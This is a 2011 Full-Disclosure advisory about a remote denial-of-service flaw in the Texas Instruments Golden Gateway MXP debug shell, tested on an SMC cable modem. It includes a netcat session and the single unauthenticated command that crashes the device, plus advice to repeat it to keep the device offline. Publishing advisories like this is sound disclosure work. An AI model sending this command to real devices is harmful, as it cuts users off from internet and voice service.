#######################################################################
Will Urbanski
Application: Texas Instruments Golden Gateway MXP Debug Application
http://www.ti.com
Vuln ID: SHR20111201
Version: 2007
Platforms: Embedded (tested on SMC D3GNV Cable Modem)
Bug: input sensitization DoS vuln in `show rtcp_info`
Exploitation: remote
Date: 01 Dec 2011
Author: Will Urbanski
e-mail: will () shakingrock com
permalink: http://www.shakingrock.com/vulns/SHR20111201.txt
#######################################################################
1) Introduction
2) `show rctp_info`
3) Impact
4) Workaround
#######################################################################
===============
1) Introduction
===============
>From vendor's homepage:
"Golden Gateway® software is designed to run on Texas Instruments (TI) Digital
Signal Processors (DSPs). The software, which powers voice, fax and data modem
transmission over the Internet, is inside products made by industry leaders
such as Cisco Systems, 3Com, Nortel Networks and many other leading voice and
data communications equipment manufacturers. "
#######################################################################
==========================================
2) `show rctp_info`
==========================================
Executing `show rctp_info 1` results in system failure due to a critical
process being terminated. The show command is normally used to display system
information and should not result in application termination.
$ nc 172.16.1.1 4159
�����!������Texas Instruments Inc. 2007
Golden Gateway Remote Command Processor
MXP>show version
show version
XGCP Version: 2.7.0
CM Version Label: 2.7.0
[...]
MXP>show rtcp_info 1
show rtcp_info 1
MXP>sigterm_prog=0;calling vp880_restart
The DoS can be initiated remotely by simply sending "show rtcp_info 1" to the
MXP shell. During some of our tests we were unable to regain internet
connectivity until the device had been unplugged. In the event that
connectivity is restored spamming "show rtcp_info 1" to the MXP shell will
ensure the device stays offline.
#######################################################################
===========
3) Impact
===========
As mentioned on the vendors site the Golden Gateway Remote Command Processor
MXP Debug Application is included in many embedded networking devices. "The
software, which powers voice, fax and data modem transmission over the
Internet, is inside products made by industry leaders such as Cisco Systems,
3Com, Nortel Networks and many other leading voice and data communications
equipment manufacturers." This remote denial of service was discovered in an
SMC D3GNV DOCSIS 3.0 Multimedia Voice Gateway which provides voice, wifi, and
cable internet capabilities. This vulnerability _may_ be found on any device
that allows unauthenticated access to the MXP Debug Application shell.
#######################################################################
==============
4) Workaround
==============
Restrict access to port tcp/4159 on devices that are allowing unauthenticated
access to the MXP Debug Application.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
